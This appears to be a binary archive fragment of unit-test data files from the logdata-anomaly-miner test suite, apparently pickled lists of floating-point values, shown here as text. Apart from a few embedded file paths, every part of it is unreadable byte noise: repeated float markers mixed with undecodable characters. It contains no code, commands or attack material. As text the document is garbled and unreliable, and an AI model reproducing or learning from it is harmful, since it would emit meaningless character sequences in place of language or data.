IvG?JF0G?sG?*/91G?.B)i5G?І)K2G?#TPG?ŕ G?$G?mG? m9G? vG?K:(G?X 秽tG?]G?. ],G?PmKG?꬯G?틕ۈjG?Y2NG?G?{:۱G?ܔg$G?J?G?]G?zJG?ɝ$7G?G?H۪G?|+X) G?K+G?띪eįG?bၮQG?h G?Z#G?WG?AWuG?k' G?AeWG?rB+sG?U6G?iJG?멇 ŬG?B儱VG?j'G?( RG?7[ HG?kbXG?>KG?랞+k!G?yG?A G?憐޵G?vOG?sYFG?^G?BdG?끒bG?E vG?$ezG?%|[G? }5nG?=R|G?>{G?fMG?OG?]w+]^bG?>ԯG?!,VG?]/G??HK0G? 9G?y4G?=!0SG?o%'G?<%%G?38rlG? .COG?f#G?H'G?kgd`/G?F|`G?#IG?cwXqG?臎{|{G?.G?Օ23G?fH#G?7F:G?H* MG?DG?eG?sG?!"G?Wsn%_G?.]G?]JG?ږkVپG?G?F 2G?Y{QG?E{G? ú|G?:m?G?-f-G?<5RrG?$GG?)(:G?T|m?G?ퟝ#MG?(q8gG?sUbmG?KsG?P}K[VG?|CHG?*ǣG?w٤Ɩ$G??͇qG?է0MG?mPG?]pG?yG?.>nG?\y%G?d G?>ce(G?ٻK !G?6G?h9QG?GG?*G?2~4ZeG?hggsG?&G?gTi6G?O;LsG?$%G?盐{)G?Y uG?^s[G?!u{G?4e%G?8{nG?;~G?aSG?N&KG?̆?RG?_G?6#yG?Vu1FG?2G?WTG?J G?C2HwG?|,eG?&G?,qѻG?'F'G? SG? ݾtG?+BAAFG??tgOG?ශ0G?Z*8G? OyG?.G?0/G?rjǛۿG?E#)?G?ф(.G?!}G?,9G?BIQG?zX'XG?E1~G?IT G?#犠G?fŇ@G?݈,HG? G?y=%G?닼kG?DJ@HDG?ćG?շ$G?炈xJG?*˷G?uG?jTG?ŷ}>G? =i8G?9W'G?BG?B+=qBG?1He`dG?]G?lfȃG?IE:G?pG?¯QG?2RǧG?+x#0yG?NiG? G?<G?>WG??G?s8G?T 3G?oG?pMG?Z4G?;q9`G?O{IG?6G?i5G?km*G?QgأG?#|G?G?䏾)G?GpAG?!$2G?$گ&G?+.G?|NoG?˸]iG?_tG?= lG?UC硗G?{%G?ʊCG? L4G?iߜG?nG?=G?`*xG?[^G?Bq=G?:g)G?N{֧kG?o G?1uG?4uG?צLMG?aG?,NG?G?隟CG?ȸpG?[[uG?m?'G?yT nG?ZG?Tpi7G?y}qG?qھG?(3.eG?uh_%}G? M`vx'G?Z/G?(,:?G?U"CG?h,JG?їO0G?гIG?wG?u3|9B4G?/ %_aG?mnJ`G?p)EG?bcG?A VG? hG?ARG?M9)TG?%'o0G?ݪG?겫G?˸GG?هîG?㡋iG?)FG?j+"G? G?+vG?GunTG?VȥG?վP 3G?Ǯ>3 aG?@!CuG?K+@wt6dG?LG?F#iG?B"?G?/WG?Yf^\G?sKG?'J0.%G?WA!G?\/YbG? )t'G?5&>}7G?3˂G?I&?G?u|G?Q&[!G?8koG?L fCBG?̼G?G?fPG?dKG?V_1G?_A?G?Ø7VG?Cʒ;}G?WG?fZ|,G?G?޺ǼG?N$G?߳vT:G?/G?U_G?o!+G?tϔG?*l}GG?\]G?*aXG?8G?$G?ݨOG?꛰ G?TQ\G?K{G? G?~+IgG?S5LG?h:#G?r7G?G?S<}(G?VP|G?>UGG?[QG?zǭG?\^eG? dG?9p@G?uG?gaoG?zv9G?AiG?\oG?Wn[_G?9~Y~G?~G?濴o}}G?EQPMG?JG? UG?棚G?txG?a#G?n׏G?弲G?xfHG?+?@G?Rn%PG?lsMSTG?+G?*G?7+G?EXG?G5G?G?%lG?^ l$G?JJ^G?n4HKG?>G?u?tJG?]:1|G?΃K%G?]sKG?]7/CG?~jG?8\XG?5" IG?A+G?c G?B'ՔG? :G?̝G?vFG?칠G?G?KAG?rLNxG?ޘQG?1c|G? G?5+G?  rG?޾G?tS\cvG?hcF=G?q^G?/"G?AgG?嵰F(G?$k ~G?3zG?Ak)ϘG?/e6G?уI?G?fJG?^iG?iS4CG?ݗ?G?,ACG?炻_ηG?|qc'G? 
chG?Kb&uG?KzG?swoG?%G?8ccG?fjG?/G?ڣg[G?SxqG?.; G?G?\[G?t>2 @G?LFRcyG?H`J/G?tD)G?PsG?GSG?~nG?svnG?:G?衛1G?oG?+S5G?Ɍ6SG?08LG?LyG?SG?;0G?hՆG?[/G?u3G?muG?0\G?Z;.G?)j04G?떄#LG?K=G?K3-G?0qG?esd_G?ya'hG?G?˚DG?G?%G?%fDG?{m&G?!G?;f>G? .G?67G?b ;CG?bSG?)|,G?ㄋG?ZVG?[UG?xokOG?yGG?H9G?`*G?- vG?=mG?ŃEG?r3ܧG?# G?۔Җ G?w|G?Uq`G?$#V_G?}ШsG?AwG?ݑ(yG?#[G?Sg0_G?f64G?ǝ^ɗG?aG?TG?vC>G?}FG?:G?e{G?{SG?HaB5G?ƭG?x%G?/G?'IZmG?>FCG?+\7]ݠG?䌻[G?wG?3[`G?84XG?AjJ G?>b6G?ΪDF G?5#]G?H#2G?碃G?%G?hv/G?nsOG?=#ŎfG?@7G?)e~G?{ÀG?胇-G?+.G?&QRG?쎻5G?BkG? G?; ,G?ExG?1ӱG?}&7~G?_v>EG?EfG?)G?'G?⻍7TG?bG?h>G?J;G??~G?Iw ǛG?TG9G?l$G?@$G?[*UG?녏ԼG?0PG?呈ZdG?º)G?G?D_ G?eG?47_G? ^G?idbG?,G?ꚡ. G?e\>G?f>7WG?Ifp/G?Ni8G?PG?ߣʤ_|G?`X&G?m; G?xےilG?G&pG?T1G?uR_G?ڦOoG?$puG?ЩG?(\G?nT%G? 'G?Ok-gG?dJG? iG?= -G?/`-G?CWG?NG?M-zG?G?) G?:G?&yvG?2VIG?\ЮHG?2TWG?PB>CG?ϿwG?J`G?a,\G?۷f~>G?[JhG?B .G?[G?Q }G?ڿNG?ꫡqžG?B0G?r?pG?cUG?4HqG?9G?dG?~AyG?3YG?2OG?M?G?!Е;G?NUG?ދubG?皶IG?؎G?-h G?]^UG?vG?~:eyG?l,G?G?<@>G?5G?&ه;G?շ9G?u G?K {G?<$5G?G?,cQG?žG?Y;Km'G?h6G?:]fG?,A֙ G?UXG?$VG?{G?ᛶ G?ցB_nwG?[IvG? QBG?u΀G?AG?㻀LG?NG?AG?~[G?|ˡeG??eG?NQi5G?j<nwG?rXP'G?'"G?۟[ G6G?L 9:G?WG?8v,G?iG?2G?<;G?x{xLG?Đ2[G?6/G?g̨G?LH )G?_G?r G?SG? G?M @G?7xSG?G?Ä2 G?*OKG?,`/@G?LpG?᧱;%HhG?eG?Dg:1G?fUG?ͭG?-&fShG?}KG?ZgG?cvɩ'G?zG?Yѷ~1G?ߞiG?& G?TWqStG?<[ۋ!G?G?c)7G?lC|G?y`ŔG?.9G?/ukG?}G?E40G?_IG? 88G? 5GG?%^LG?C&G?oG?d6qG?uvBG?qGMG?T`G?qG?aoG?9ZKG?铜zG?4EG?S+pG?; G?&[G? -G?};G?p,yG?-Yx)xG?߾߸G?۪cF^G?I'-G?h6G?.G?BG?@avG?/G?mon=G?뚨wKG?n-o3G?]ЌvG?nLD+G?rex憾G?YG?_$QHG?wl`VG?~4!;XG?9G?Jl 2IG?Q;7G?2G?Z‘iG?uG?^Z G??sYG?}B G?{h U G?㖠G?ddIG? +\&G?w2G?RDm}G?", ֫G?QG?ɖ>dG?[^>G?hc_t^G?yx8G?? ~G?$CeRG?]'`G?G?&G?I~3|G?:ṖG?[qG?iWG?bN_1G?L"k)7G?疊qG?օjDyG?p=DG?NG?羴\&G?VuG?7>G?lO'G?߰w[e](G?t G?ߦ3G?>=َG?,۞IG?r~G?} :4G?ӵG?uNa7G?9dG?ަG?l<{H G?p쁉G?ޡtykG?뭱.cG?_8ʄrG?7NigG?鋹G?|4>G?$WG?CtG?) AG?6,zG?@G?ɋ)oUG?"G?v,܇]G?郈-CG?6>kjG?G?3$Κ*G?N}j_G?ːZv G?z*x=G?菨5G?pPZºG?wstG?qѧG?귤MlG?'pG?i@G?N8G?BG?m@G?K$G?q/kG?a&G?}5L4;G?%4 kG?+sG?xgzG?ѽ{G?c}+!G?Ӱ]TG?q(G?M~G?(#G?눮SyvG?&lG?]4#G?U G?YFG?MG? 
G?QG?t9G?:,G?rjIG?D*G?xvG?ï3,G?Aʕ羿G?S DG?ϬVv[0G?cG?}S1G?싄ȽG?쵰G?Ȳ7G?8MG? HvӓG?Z3OgG?q3G? qG?ᒢpzG?:W?G?F[@G?ڂG?:tG?̏uPG?)ٙG?:4"ZG?sf5iG?XG?膜ܚ^@G?HG?mL6G?GZ;G?YG?B\G? ǰG? ]G?{:( QSG?yJG?N2G?1*E#G?TݞG?p#G?1PCG?7G?ћdZ&G?톹6`G?5G?ΒsPG?0 sDG? G?MfY=G?'fG?5G?P|{G?ذ$bp;G?ʯ1fG?m3(G?$ifaG?ݏ}G?YG?t(=G?}A G?k7OG?"DQKG?SbVOG?LϬIG?ޕT,G?ÕG?KaHMG?)ѣG?poEG?#VtG?'G?i2*G?1G?M1+G?YZG?mEG?I"?G?`G?zUpG?cdPG?8b"G?iE)ZG?Xm{\G?- i1jG?_3u +G?zbN; TG?›eG?}yG?(>g1G?oj? G?E$G?]@1G?儜G?wݮf2G? G?⎖֪;G?t_G?X G?$_&c.G?"G?O?bG?0G?BG?ϼmG?3/U+G?̱G?yl^G?YG?$G?ℜ(G?0z3G?KG?15lG?X^/bG?xو}G?)LG?$G?¸*G?CbdG?㹯)G?3옢$G?up\G?ujWS[G?!9+kG?waG?ͥG? F G?8NIG?W[G?.wG?K!G? 0ݟ9G?VHAG?|X{G?D߬G?,reG?EG?5 nG?4+IG?TN:RvG?L1G?WD|G?mϟG?CG?/)$G?au$nϾG?Kk]G?m՞G?}ggDG?XڕG?RSG?SlnG?A7G?3jG?SГG?5=!G?pnG?;G?٬շ8G?twG?IO\ G?U:G?؁G?ɖzMtG?i +G?mBG?ݴrG?VM1NG?qZwG?<)G?5l{}G?G?G?ˏG?cG?7eN.{G?UQ}G?@ ؞G?ܖdG?DG?T YG?xðNG?瓬6YYG?9pzҠG?uǼʪG?0߯AG?RPG?樊A^G?sG?쐥-G?mG?W2G?J!^G?ަ^gbG? iDG?ܰ \G?4QyG?brG?wP4G?lOtG?놼1G?> ҖG?꫇k64G?>5G?꾧WrG?囪+WG?>#eG?lN_G?9[G? ^FG?4m%G?㗴OzG?FG?MmG?rVG?!nG?1طfG?]-G?WpzoG?"W6G?]wG?[3Bf G?LUG?q? )G?xF9ߗG?]KG?邗UG?*l{iG?䘦UdihG?⼪e:rbG?ؕ*`|MG?%G?5sG?Q ]G? r}G?CX4G?>A^pKG?=dG?Y?AoG?iHc2G?ԕTG?QWG?܃ZG?Ml3G?\vG?,Y -G? +G?>z'kG?阳3G?v4G?HOG?'z AG?4xbG?ԝ6G?굽|G?@bG?m9G?>}G?轣'G?cG?U%G?n8`G?ى|ڻG? θ0G?Q6G?)AG?1G?F#U{G?G?㳫Ä0G?TG?G? gFG?̊ G?;tG?Q !G?WG?ЙzG?:6<G?Rq G?c.;B`G?`z7G?LϫaG?s@*G?uxG?6\qG?XG?vs}G? \G?ЖZidG?PzHG?V3*yUoG?^o-xG?lOG?SG?ǑJbG?O¯hG?%tG?dG?q46G?vG?VeG?#G?8\G?DT2G?L/G?yG?vpG?/ G?em0rG?F0hچG?+iG?I+G?u}qG?͐G?5k7G?]BuG?(=?܆G?7X|G?->bG?f&WG?otG?s)G?DVAG?l-$A%G??7G?̚K G?`-G?5p _G?5I.G?IjhG? G?}zuf*G?-zG?dE7G?+fG?;G?S~7G?Dq!G?eG?Z`QeGG?,G?랉ۣ5G?"4i4G?{A"G?8˔G?RqG?X-RG?H,NG?Ѩ'ːG?;%VG?G bhG?̙}Ry;G?iB\G?iG?^@iG?bG?1ùG?zVG?zXEY=G?33G?=52G?tjxG?.k"G?s/D \G?ڌ˿G?-tjTG?G?).G?[%G?$G?u~ɩG?yG?yJjRG?]`G?ݷ𐑾G? DG?ۣ&8G?+J M*eG?d(>PYG? 
ORy`G?vG?䃔f kG?౔kG?ꡋ~oi:G?J\G?| G?&G?&RG?rlaG?IG?G_G?E0SG?|]|}G?LTG?xG?]o G?N ?G?r]JG?eGG?jeG?=G?済Z}G?GšG?SYbUG?FoG?9(G?D{}{9G?>v G?ng] G?9揹G?R6G?]$G?)P[G?I^&G?HEG?Q8G?L{G?^M`G?8G?ܽѬdG?@G?6FqG?QG?siÔoG?Љ3iElG?%}fG?UG?kzbG?׮ZΣG?L,Hw9G?=BG?)`.G?OV5jrG?;IG?RzyG?g&ilG?[A.IG?rG?`OG?lW}:G?;.G?yLG?-i0G?H:G?xG?1H.G?DG?J@G?f`G? NM'[G?K2 G?WG?+G?(tG?2ԿwjG?ጽG?,VG?;jW+}G?n]xG?hG?٘G?䈐S&dG?igsj8+G?4KG?RZG?jyG?ؚ$G?ݮBG?x-G?e62G?xKG?hIG?OvrG?OG?篘G?\B(G?zkLG?OOG?$kBfG?ݽ!2G?JJG?(`IG?WBZG?ƀG?^>*G?άBrG? +[lG?f AG?0'@G?W([9G?LqwiG?A̴@sG?ZG?8ӮG??0FG?"G?ʼ0.G?սG?Y^#G?d6ȳG?9G?썉/G?d!1ޅ4G?㭎V}G?9wG?ՌG?SWG?G?MG?G[G?ٌG?:ث;G?ny;\G?5G?YY$G?#,G? EG?ItJG?+G?"U;VG?ߩ%HG?䶀Lj2G?ۉWG?X`G?ȬG?ѺPG?|G?垡!SG?t; G?c]G?bXG?ғ"cG?6DG?hbG?bgEG? G? wG?.)SG?tiG?a"nmG?}G{G?,G?5uG? BG?;G?弔vG?wCH@G?͌syG?eG?$azxG?A";]G?[(fG?"+5 JG?ΤG?'G?vG?sG?G?(!G? 'G?5G? e G?,;4G?hG?ݠ]u!G?G?%CG?g{OG?hBHG?EB|G?Ջ}㹘G?G?#YG?DEnwG?0ZhG? G?G?9LqQG?mhRG?'m>G?ݦ5G?G?*9G?칾G?I`DkG?c HabG?XOp@G?飚؅G?ZDB|G?ݠ jG?2q5G?utG?EG?ykuG?繦(G?:t^.G??p>GG?>lVeG?dbG? }vZG?XɎG?;veG?8=G?UG? /G? d@G?ٷ`r)G?PPG?: GG?ӻqxG?LG?( cG?ޖG?u`A2G?ګJlG?>nNxG?뷤.rG?G?n+r+YG?rI G?EðG?"B6G?4TG?ZDKG?X:f G?pG?2qG?4tfG?6 G?kb@G?A3G?N KG?P:G?9r_[FG?AG?]DwG?/EG?GG?[G?_)yG?蘎qd G?:%kbG?O`G?{,FFG?nhoG?"|WG?5ERG?qarP(G?D׳G?P>CG?Cu=J G?U}NG?蘘l=G?~k(sG?60^G?{&G?LbG?X4G?G?'\JG?UJH&G?_G?tEG?2G?f/G?F,G?=ڨMtG?4~FG?3G?VG?vG?& :PG?G G?z1G?$n G?V?^G?[ vY&G?k"KG?:'G?`L}G?G?L`$9G?(c1G?]qG?n5G?2- G?(@jLG?Wv bG?)j}6G?`1AG? &G? J/;G?I$G?儡r1G?S G8]G?6G?b~|tG?Bڨ!G? 'G?a,&,KG?*pG?i.G?ˤ9pG?YG?!C+G?h |G?C=@G? =G?,x4G?4PG?ԑEG?AgĶG?y G?PMG?VnG?ʋ 1G?~e](e](ee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta3_data_test3000066400000000000000000000432761500476301700275270ustar00rootroot00000000000000F](](G?ǡD6G?.mϥG? 7N9G?JZCG? pyEG??oG?8G?yd&%G?1x/G??83G?ԸJ-G?ĢuPG?I`G?܏G?mXG?շ;G?7U'G?ʚYPG?eTn1]G?U[JG?s˛sG?,6̮G?1YwG?٪-Z[G?Pw xG?=ڷ*G?pmzG?ȜdG?$YG?QG?MH%G?R< G?QEG?gC!G? r)tG?òm\,G?rNG?_G?w4ȽG?;G?o@O2lG?͂dVG?\JG?2|G?|G? u˞`G?"AG?[. G?`IGG?>JG?чMoG?˥h.G? {<G? Wj)G? 
G?dh 4G?v:G?8p0=G?ПDÄG?X,MG?ť;_G?͚TG?gkBG?٢մvG?Lr6G?̺hG?כYG?J.WG?+4GdG?0թG?HeڲG?"G?7x9G?Zڪ| G?|7G?5;sG?% 4G?˭G?`G?ٺTOG?͙fG?Km?G?\}G?rz:G?~kG?c#|"G?:%bG?Ʌ-6G?#G?hL'G?R:U7G?G?ȍ0w=G?e= G?.G?QqVlG?:{%KG?g!1MwG?8,hG?8G?|#MG?vqWG?62Ñ$G?Jz~G?ӠtRG?#\G?0~VG?CvG?Ǥ(G?ŻPG?m G?x<9G?6G?ɋ0G?n&rvG?G?nuG?턆ŬG?:b3& G?ɓE@G?~ͬG?/lyG?pG? ݤ G?WbG?ԂqG?dʟRG?+G?اcG?eZJHmG?ɁOG?U G?k 0G?G#v TG?豸UsG?1 G?&G? `G?P|«G?0#G?TsFG?"?RG??VmG?G?;j.G? \lG?65tG?$  G?}U!G?Ë:!G?AJG? MN?G?7ݥG?||I)G?B7$؀G?ԓ'eG?}l7G? iG?r1G?XOJlMG?P*yHG?lr _G?܋cG?Va}G?hRG?9G?{ҦG?KG?ү% G?5G?=vN?G?㳫\`G?XG?ĐbҤG?e7G?&gG? ]ΎG?%WG?NmG?g΍ G?WG? $G?>2G? tlG? SgG?woG?޼6:G?3:G?L!&G?i!7.G?݈,„G?DVrG?v{lG?_;CG?KÔG?v2sͧG?ذkzG?,%^G?ͱKG?"bG?=ONG?6"JG?^[٫vG?Ta3\=G?кg|+G?o^s{G?ԽnG?!{G?ԙM*`G?ٗ^G?@0a:pG? 1G?<G?ם G?+fM&qG? VG? G?֮;G?r~G?[ɂG?ֽRÞG?D54qG?~nG?P2G?YdAG?ݯ G?ǣG?9hG?Я\7l9G?WqZG?L1G?z.G?IEo G?vEWG?"G??"G?zdcG?܎8ԡZG?r"G?~NUvG?|xG?nbG?2K"GG?L @2G?? G?p؇;kG?*c+|uG?P]G?"G'G?bG?Έ`DžG?,SO4G?rG?L5$4~G?7BG?=G?,yrG?g@G?ä00G?yuPG?G?5uVG?̸yuG?op9eG?e>G?_!G? qNG?ZH>G?ytzMG?L*sG?|$PPG?PsrG?pG?ڝw.rG?8G?@YG?"2)G?'ġ~G?ж+G?G?VQ9G?\L'G?ܒrl&G?rVG?I.EG?ׅ5G?5y_G?ى WG?LG?ThG?%LTi G?}ZnsG?o G?吇G?y9hWG?s G?/idGG?hASG?|G?BI>7G?aG?~-1G? >G?|%hAG?jG?Q 7G?T[G?": G?5h|G?x6\G?E̽.G?,G?l.G?аuXhG?ƿgh+G?hnHG?*cG?ޚ|حG?guG?T G?[nw'G?ܱ|y#%G?LXG?xojG?QAXG?,}՝OG?(J G?BG?P/G?Ϲo+3G?@}G? 6G?µE8-G?RHG? G?2!G?c<&iG?ѵ G?ԦWG?ί}G?Y`G?NcQG? hG?% ]XG?@vG?e%G?2hG?r{_G?ycoxG?rƢhG?+{PKG?uoG?Ƣ~aG?OoG?/yG?ڐܨlG?֋+OG?yz@G? z ~G?ĒG?ϕ{aG?S6G?ʵ,)=7>G?bc_F"G?u!UG?v`8G?6q9G?oG?3cgxG?ҘﮍG?5Lߞ G?ٰ_1G?ܖ[G?x;?2̗G?k +7zG?f$>i>2G?HלbuG?fG?фaG?zG?G?G?IG?',qG?]J IG?ϻ^G?R>G?YhrG?LJ gG?G?#@reG?i] }G?4ey G?㖏-G?SG?Y,G?.IG?ŋ]ްG?plaG?;ݛG?RR'G?C}*tG?+G?Չt%G?+vzG?%e%+מG?|XG?ѧ~\1v^G?9b(G?MG?ښTRG?Ӗ 0-TG?㮗YG?p"a9G?֑ ÛqG?mG?pDnG?cUOG?8h!ĤG? G? G?]>G?Ɠ`zG?{"G?YKG?G?u=8G?ҥMG?@xG?ѦQFG?Nj G?ɓqd;)mG?jkG? 
G?Ճ4)G?(z_#G?"G?ݳG?9+(G?\ʕG?w}iG?i_G?[R\G?:׾p"G?<-1qG?[HG?WG?ӥv`%{G?շ2ސG?PG?G?w'G?0ЍG?GlzG?,h9uoG?QdjWG?ɧ G?NLG?FM}G?*O>mG?ӋG?*)G?^]G?xCDG?reQG?*嫱{G?a@NG?9IG?6BwG?ӄNbmŠG?[⋘!G?,t[G?1`$(G?f5BG?6y]G?͔S&NG?`vG?ĸacG?׈QӀ G?_G?$rG?A0G?3RNAG?1LcG?O^ 2VG?iZG?-G?unǡG?ΒFG? vG?>Ŭ"G?·JtG?y={[tG?G?%G?锞G?̖=yG?FG?Q@'g:G?ڿ3QG?ŽYG?-@]G?ښW-OfG?p1UG?9uV,?G?6G?!G?@>C G?3G?Vo.@G?Ⱥ mG?d,G?u`(G?c~6B#G?HNG?"`„G? ʐG?RQHG?ⶡY'G?yR G?GG_7G? =G?uG?nw+G?u@G?`K#|G?˾URkG? ΟMG?a~MG?W,1`tG?i6G?ȝG?&Х;G?K G?KG?0\G?7|! G?ۏn^YG?slG?%QBaG?NkG?` 5G?nG?#D6G?G?թsI)G?jHLG?eSY"G?'G?bŪI{G?i7F]G?``RG?/K\耼G?xcW>G?ᐖiG?;YJG?BG?a!WlG?WVG?2G? LG?M6G?t>Z5G?ש9R^G?CnӯG?1G?3YܱG?Ğ}*BLG?zYčG?#E G?t2~G?ћ%ߚ$G?vG?ʮG?܈G?5vG?X|(G?½7jG?քuG?>ctZG?|U\G?G?LG?7ʭ G?uG?w/\G?pg<_G?ܳ3 KG? 8GG?АdajAG?Z_6G?׮· nG?!6:G?")ukG?Չ9G? >G?1٤kG?ϳM|0:G?C07G?[G?- G?՜Q9pG?UG?Iǣ*G?X G?az-G?iYPG?mZx G?ꦑG?ɀZV3G?߯pOLG?ϝ.G?EG?WqG?y.G?AqRG?$[nmG?aڷ-G?׃\mG?ƃ 0G?FxTbG?ƾ,G?nG?6#ͫG?r2qG?nSnX| G?R7wOG?M-G?G]*#G?h'}G?HeG?tzG? cu9G?a7lG?*]G?Z#G?͆G?ŦF|G?zG?>bG?M'1G?،JG?ʐ`W^c G?~Y3UG?_mG?-G?lk??G? :9@ "G?fPOG?[S-G?ѰX?tG?fCG?ϣ^eG?ޱ&G?.G?ijG?:C~G?_G?g~G?X6A~G?eBG?ū/+T G?7w_G?ӆtG?#PG?Z(.G?Ԭ3KG?@b?G?B*G?^䧿SG?).G?;׭fG?zkOG?FxG?lG?Y;G?ͽCQcG?#8G?*IG? )gG?bG?ԵvG?ЃepHG?ڝnA\bG?0wdyG?38wG?.oG? G?:G?}:G?QlgBG?yY|G?RG?b_;G?)G?vF8 G?ۥnG?֌4rG?6BUG?%! G?QZ|FG?qMZqG?gBG?r EG?q;fG?T'G?ˤ]G?Ƕ"G?*JqG?eNuBG?#HC_G?UQG?LtHG?EG?(F%1jG?щ:QG?+n"TG?EݻG?c,$G?ȀoG?(;PԼG?Ÿ*G?9$נG?!ɴG?Ѣ5:G?2Z89G?tS2G?} G?~UDG?,xfG?=*LG?#G?,?drTVG?Կi>G?y/G?ه4G?{G?qJG?C4&G?vbG?cPGTG?^v/G?X\G?᪷DG?$G?%ЪG?}R;G?|7)SG?ځu:G?7:6G?7zU G?sϩVG?œK@G?͎j,G?c:{G?sxG?چ>N-G?qG?ӛvG?)^&?G?ߘmKEG?RϵYG?ӯ$ۍG??cG?IB'2G?`(TG?ױ$^G? {4kG?wi,G?AG?`7l;aG?¯±G?vBqeG?؝zECG?e67G?Ħ *G?G?]0sAG?X8G?ZP'YdG?G?# UG?LG?҈zG?ѾkG?_1uG?Q&G?8\lG?/KRG?vn3G?HyG?bJ1G?xBG?fG?5yG?Ӷ 籇G?ʚrG?pq/G?\cG?+Ǩ6QG?ݑoҽG?ặb[G?ZG?ɪNկG?vUƄG?=jG?bWF%G?бGG?1QnHG?sG?A'G?ʶ cG?Ql$G?%kjG?HwG? L3G?(G?G,G?X+G?_1G?>G?TA{}G?ԑ6:P#G?Ҏ i1G?ڼ[X.G?)[G?$K}MtG?zMhG?w'_G?4'rRG?rKյG?ߝG?^c-G?+G?ŋ G?z.%G?݇Q{G? Ot?G?<W|ȣG?}sG?EIjG?JƭG?-9tG?ad/[G?y,G? 
+xG?h"xMG?V" TG?Ɖ?G?AtG?òG?܎^G?+G?YzZu!G?M G?6'_xG?8 ](G?uG?·n\G?NoG?U=AUG?G?IQG?h5LRG?UPG?Yrf G?f_y5DhG?N,}F G?:k&G?Q[G?XUG?~zqFCG?ՑG?yN\G?DSG?_Q;G?^ G?߽\G?OG?[ے":MG?y޴G?Ņ AŹG?W֬G?N$G?dzG?#D G?埒G?LQu#G?ג(B3;G?PNMG?{0G?e'qG?֊)ُDxG?Yj+'\G?G?!L`mG?pwG?ID7G?揱G?]5jOG?VtkG?їdG?1.lYSG?> G?r iG?O qG?%~@G?jG[G?G?BW)^G?Z0]G?FI:G??`5G?OHG?պ#G?$&}G?c3G?slDG?wkG?s}UOyG?ΚatCG?YuׄlG?ن.n-QG?aLqG?钚G?~X>mG?6c5G?oG?sFnOG?֝G?܀}G?odG?HHG?1-G?TG?VԕwG?R5G?VXsG?7ApG?֛WDG?ǧҨG?(5CG?֝%G?f]ъG?~p3)G?@t#.XG?(gWG?ߞPfG?4G?*~}~G?1g?fG?AZcG?G?aG?Q#G?ʝ/ G?ʦ wfG?(XλG?QG?+DG?@$pG?i9G? "1G?ZG?#ƄG?5:jnG?0,G?cHG?-+f6G?^aG?G?!%xG?ıket;G?ر]G?6h)G?XґG?<>G?48G?O=3G?Y?1G?6'oG?6F;EG?pG?qjuG?f7.vKG?هG?UѿG?{ϟG?{UsTG?òl?G?ʋǪG?XG?ōJG?%5G?ל.JoG?~: G?iVzG?kI~G?~K2hG?1s G?1qNG?Ԥ) G?ֹYa G?PeG?O}G?Žfؼ#G?Z~G?,}͎G?͓T9jqG?jBq&G?%` BG?B5rG?נŐ-ƦG?5Z G?aąG?S^G?˺G?G?A]G?}cqG?qG?y$rӋG?޸0,G?_MSYG?kVG? 굜G?rEG?t[gG?<܆G?ԁuG?L:G?;&G?0,MuG?ssG?\A hG?+G?1NljfG?:G?G?֪ڏG?իBG?5WmaG?ncG?cL2}G?bmG?ܨ0 G?k_܅G?r#.G?O&i@bG?bЎG?rw]G?H LG?pNG?©e2gG?{G?ۮ G?A VG? "֟G?=gG?кWᘩG?kD8}G?ʲjG?h۴G?ΡU+XG?'21G?͜߈G?_bG?lV$G?[yw.G?c uRG?+ڸG?5`OG?P%xsG?%G?\v#G?e7G?mG?*$G?OZu]G?@Z[G?R|Q`G?Gs>G?i?KSPG?+;rG?I5G?rt0G?ܕPLG?Zi!G?GrýG?ƚ+:G?x% G?M~2QG?SCG?B/J7:G?XwZG?69)G?s0&G?!G?\RlIG? G?g8/iG?ƽRg2G?LG?h:TVG?׈iG?VTG?#G?qcIrG?΁uE 2G?$8jBG?G?eG?~RUEG?G?@u{&G?`G?ԏ'RuG?RL G?ӀmQG? G?fM@G?oG?ۗN͂G?UG?؛XG?Neb_G?\G?ĮaG?ػ pG?sWeG?Ɂd'G?WG?#G?Q2JG?ڥ\FNG? S0TG?otG?9*RTG?-#G?SGʁ,G?>eG?βΒ?G?z CG?ȏ G?M3_G?NKG?Fd%e](KKKKKKKKKKKKKKKKKKKKe](KKKKKKKKKKKKKKKKKKKKee.logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/data/vtd_data/beta3_data_test7000066400000000000000000000647021500476301700275300ustar00rootroot00000000000000i](](G?G?L=G?4 !LG?Q+$6$G?- G?ߣ: G?ǿoG?rG?Ӈ`eZG?$*G?_g\G?ՒMG?h3G?kUc\5kG?j!+G?f@;ˢ8G?@agG?ۆN?%G?ԴG?ɲQG? UG?v-G?h]G?uN G?#G?W WqG? G?Ƚ%wS%G?N#G?" b G?׍VYG?IYaG??KxG?4Ī G?Y{G?OgG?ȉRv_G?EG?HT"G?ogzG?3kK`G?uˢG?أpG? KG?àoG?֤haCG?Ϯ{G?9x8G?ᚕ>|pG?qQG?EK<ϋG?5^G?tuFgG?K ]5G?G? x(c<G?i.RG?neG? 
dIG?u5J'3G?VdkG?QlxG?>=,aG?4]lG?NG?(ϯg=G?q=G?}x뵗G?j/sG?+G?/:}G?SъG?ߒҞYG?נ/ڀn^G?'ɰG?ʊQTY+G?G?@G?F^-G?ω4G?% fG?7AG?5 }8AG?sVSG?5 ZG? ;G?- q}G?ȭ:9G?ѡ4\G?ǨJG?X]sG?J(G?bCG?G?=ʗ#G?g䒸G?֢vdG? Gw(G?׌xG?CsZG?aVG?֖RG?C3G? -pG?٥rPG?K(fG?)z~G?#j G??)rG?-IG?ɳ) G?mnÿG?d(J&G?Q?G?<'G?y<;G?ךG?H\ G?O G?Ȳ ʨnG?RTG?ҕ+E2G?ٶH`bG?EQG?*IG? WG?2ؽG?G?˺X G?˙FG?XcN[G?k(G?ܡ|9ĄG?ܫ42G?ӘK,G? fG?ӐnaG? ²G?ەݛ\G?T G?<ΊLG?ԤrbG?aT*G?îLG?eY G?!%G?кŬG?YG?[L}7G?S]G?l*kG?9oG?4RG?/6G?*G?jIBG?ڠ٠1G?z6WOG?Ҋ%^G?rG?!OWG?>nG?-GjG?Փ6RG?QYwXG?ApG?jG?N٧G?_zG?m}(4G?=CAG?RGG?ب(G?;|nG?·'[G?|{G?* G?q4cG?G?i8ٽG?Ϲ.G?7G?]28G?ԑmZkG?[s(G?sпG?(:4G?z8`*W9G?SZ G?AVG?Py%kG?ѧG?v;G?X)DG?ŸskG?uсG?[G?8!A cG?l JlG?̎ǽ&G?ۿTp?jG?\[SǦG?Չ@G?G?(+PG?YG?%.pG?+G?ȵ G?G?~{MG?lj8.a$G? xG?M-G?'{G?֝GG?ӗ#1G?܍)mG?Ĝ1G?^-%[G?͑G?УoG?ӖUG?lL]G?ס"G?H_ G? 